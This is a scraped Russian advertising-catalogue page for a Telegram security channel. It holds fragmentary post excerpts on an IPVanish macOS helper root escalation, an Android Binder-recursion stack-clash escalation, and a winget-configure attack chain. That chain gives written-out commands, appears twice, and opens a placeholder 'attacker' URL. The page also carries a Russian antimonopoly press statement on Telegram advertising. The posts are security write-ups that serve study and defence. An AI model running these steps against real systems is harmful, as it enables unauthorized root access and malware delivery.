
Похек
Канал о кибербезопасности, багбаунти и реальных кейсах из мира ИБ. Новости, полезные инструменты, разборы уязвимостей и советы для специалистов всех уровней. Аудитория — активное ИТ-сообщество, эксперты и новички. Идеальная площадка для рекламы в сфере технологий и ИБ.
Статистика канала
Продолжение мазохизма в лёгкой форме от спеца, который в прошлом посте сдал BSCP, теперь взял выше и сдал CPTS)Краткий экскурс для тех кто не в теме: CPTS (Certified Penetration Testing Specialist) - это сертификация от HackTheBox, которая проверяет навыки тестирования на проникновение. Просто "прийти и сдать" не получится, для доступа к экзамену необходимо пройти, так называемый, тематический "Job Role Path". Вообще, больше про структуру экзамена можно прочитать в других статьях на Хабре, например, тут или тут. Автор же написал статью про свои ощущения от сданного курса и Как это было, а в конце даёт советы тем, кто только собирается сдавать)
com.ipvanish.osx.vpnhelper. Любой локальный процесс может установить соединение с этим хелпером и отправлять ему команды.
Уязвимость усиливается двумя дополнительными проблемами:
OpenVPNPath — указывает бинарный файл, который хелпер запускает от имени root через GCDTask. Значение параметра принимается напрямую из XPC-сообщения без проверки пути или подписи кода, что позволяет запускать произвольные файлы от имени root.
--up, создавая дополнительный путь выполнения кода.
/tmp/ipvanish_exploit.sh с правами 0644 (неисполняемый), чтобы обойти проверку подписи.
com.ipvanish.osx.vpnhelper без аутентификации клиента.
VPNHelperCommand = VPNHelperConnect, указав параметр
OpenVPNPath = /tmp/ipvanish_exploit.sh.
OpenVPNUpScriptPath и OpenVPNCertificatePath на /tmp/ipvanish_exploit.sh, что приводит к вызову copyHelperTool.
/Library/Application Support/com.ipvanish.osx.vpnhelper/ пропуская проверку подписи (из-за неисполняемого состояния файла) и затем устанавливает права 0500.
/tmp/ipvanish_exploit.sh от имени root через GCDTask, а затем повторно выполняет его через OpenVPN hook --up.
/tmp/ipvanish_pwned_root.txt принадлежащий root.
-fstack-check: неограниченная рекурсия через Binder RPC + LPE из shell в system_server
#Android #LPE #stackoverflow#BinderRPC
В Android нативный код системных компонентов компилируется без защиты от stack clash, поэтому при глубокой рекурсии указатель стека может перепрыгнуть guard-страницу и попасть в отображенную память ниже стека. В результате стек фактически продолжает расти за пределами охраняемой области, что позволяет обойти защиту при вызове функций с большим стековым фреймом, например, android::incfs::MountRegistry::Mounts::loadFrom(), где используется локальный буфер ~128 КиБ.
Атакующий из контекста shell может использовать вложенные синхронные Binder RPC, чтобы неограниченно увеличивать глубину стека одного потока system_server. После этого вызывается функция с крупным стековым выделением, что приводит к перезаписи сохраненных данных в stack frame, захвату управления и потенциальному LPE из shell в system_server.
am dumpheap или trace-ipc stop, что приводит к вызову ShellCallback.openFile в system_server.
openFile рекурсивно инициируются дополнительные shell-команды, углубляя стек до нужного размера.
Bitmap и IClipboard.setPrimaryClip) в shared memory.
incremental_service → isFileFullyLoaded → loadFrom()).
PC = 0xaaaaaaaa).
Добрый вечер! Комментирует пресс-служба ФАС России: ФАС России контролирует соблюдение рекламного законодательства. В соответствии с ним (1) не допускается распространение рекламы на информационных ресурсах, деятельность которых признана нежелательной на территории Российской Федерации, а также доступ к которым ограничен (2). В связи с принятием мер по ограничению доступа к социальным платформам Инстаграм и Фейсбук, видеохостингу Ютуб, ВПН-сервисам,👆Исходя из вышесказанного, можно сделать вывод о том, что действительно теперь вся реклама в Telegram под запретом (Ютуб тоже). Не спасает ни erid, ни что-то другое. Из-за того, что применяется ограничение к Telegram, ФАС России усматривает в размещении рекламных интеграций на этих площадках признаки нарушения рекламного законодательства. Штрафы для юридических лиц за подобные нарушения могут достигать ₽500 000 за каждый выявленный эпизод размещения. Такие вот новости. Все запланированные посты на сегодня отменил. Возьму паузу. *Meta (соцсети Facebook, Instagram) запрещена в РФ как⬇️ мессенджерам Телеграм и Вотсап ФАС России усматривает в размещении рекламных интеграций на этих площадках признаки нарушения рекламного законодательства, ответственность (3) за которое несут как рекламодатель, так и рекламораспространитель. В настоящее время при наличии оснований ведомство принимает предусмотренные законодательством меры реагирования. Для приведения деятельности в соответствие с требованиями законодательства служба рекомендует участникам рынка провести анализ контента, размещаемого на информационных ресурсах, доступ к которым ограничен. Подробнее о запрете распространения рекламы после 1 сентября 2025 года на определенных интернет-ресурсах можно узнать на сайте (https://fas.gov.ru/documents/690033) ФАС России. (1) ч. 10.7 ст. 5 Федерального закона от 13.03.2006 № 38-ФЗ «О рекламе». (2) ст. 15.3 Федерального закона от 27.07.2006 № 149-ФЗ «Об информации, информационных технологиях и о защите информации». (3) ст. 14.3 КоАП РФ. С уважением, ведущий консультант отдела пресс-службы УОС ФАС России [фамилия и имя сотрудника скрыты]
.winget-файлу или self-referencing LNK может позволить обойти Mark of the Web и предупреждения SmartScreen. То есть winget выступает как LOLBIN для начального доступа, загрузки и запуска вредоносного кода под видом легитимной конфигурации системы.
Invoke-WebRequest (скачивание), Archive (распаковка), WindowsProcess / Script (запуск процессов или кода), изменение реестра и переменных среды. Модули DSC автоматически загружаются из PowerShell Gallery в %LOCALAPPDATA%\Microsoft\WinGet\Configuration\Modules. Исполнение происходит через ConfigurationRemotingServer.exe с использованием PowerShell runtime (System.Management.Automation).
Поскольку выполнение инициируется через легитимный инструмент системы, это может снижать эффективность некоторых механизмов защиты и выглядеть как обычная конфигурация системы.
Эксплуатация
%TMP% или Downloads и кликает по LNK
cd %TMP%\*update.zip* || cd %HOMEPATH%\Downloads\update{}
more +1349 *.lnk > %TMP%\conf.yml{}
start https://attacker/decoy.pdf
winget configure --enable
echo Y | winget configure -f %TMP%\conf.yml{}
EnableWindowsPackageManagerConfiguration
.winget или заблокировать ее через AppLocker / WDAC
winget configure
.winget-файлу или self-referencing LNK может позволить обойти Mark of the Web и предупреждения SmartScreen. То есть winget выступает как LOLBIN для начального доступа, загрузки и запуска вредоносного кода под видом легитимной конфигурации системы.
Invoke-WebRequest (скачивание), Archive (распаковка), WindowsProcess / Script (запуск процессов или кода), изменение реестра и переменных среды. Модули DSC автоматически загружаются из PowerShell Gallery в %LOCALAPPDATA%\Microsoft\WinGet\Configuration\Modules. Исполнение происходит через ConfigurationRemotingServer.exe с использованием PowerShell runtime (System.Management.Automation).
Поскольку выполнение инициируется через легитимный инструмент системы, это может снижать эффективность некоторых механизмов защиты и выглядеть как обычная конфигурация системы.
Эксплуатация
%TMP% или Downloads и кликает по LNK
cd %TMP%\*update.zip* || cd %HOMEPATH%\Downloads\update{}
more +1349 *.lnk > %TMP%\conf.yml{}
start https://attacker/decoy.pdf
winget configure --enable
echo Y | winget configure -f %TMP%\conf.yml{}
EnableWindowsPackageManagerConfiguration
.winget или заблокировать ее через AppLocker / WDAC
winget configure
Отзывы канала
всего 10 отзывов
- Добавлен: Сначала новые
- Добавлен: Сначала старые
- Оценка: По убыванию
- Оценка: По возрастанию
Каталог Телеграм-каналов для нативных размещений
Похек — это Telegam канал в категории «Интернет технологии», который предлагает эффективные форматы для размещения рекламных постов в Телеграмме. Количество подписчиков канала в 16.0K и качественный контент помогают брендам привлекать внимание аудитории и увеличивать охват. Рейтинг канала составляет 78.6, количество отзывов – 10, со средней оценкой 5.0.
Вы можете запустить рекламную кампанию через сервис Telega.in, выбрав удобный формат размещения. Платформа обеспечивает прозрачные условия сотрудничества и предоставляет детальную аналитику. Стоимость размещения составляет 30769.2 ₽, а за 20 выполненных заявок канал зарекомендовал себя как надежный партнер для рекламы в TG. Размещайте интеграции уже сегодня и привлекайте новых клиентов вместе с Telega.in!
Вы снова сможете добавить каналы в корзину из каталога
Комментарий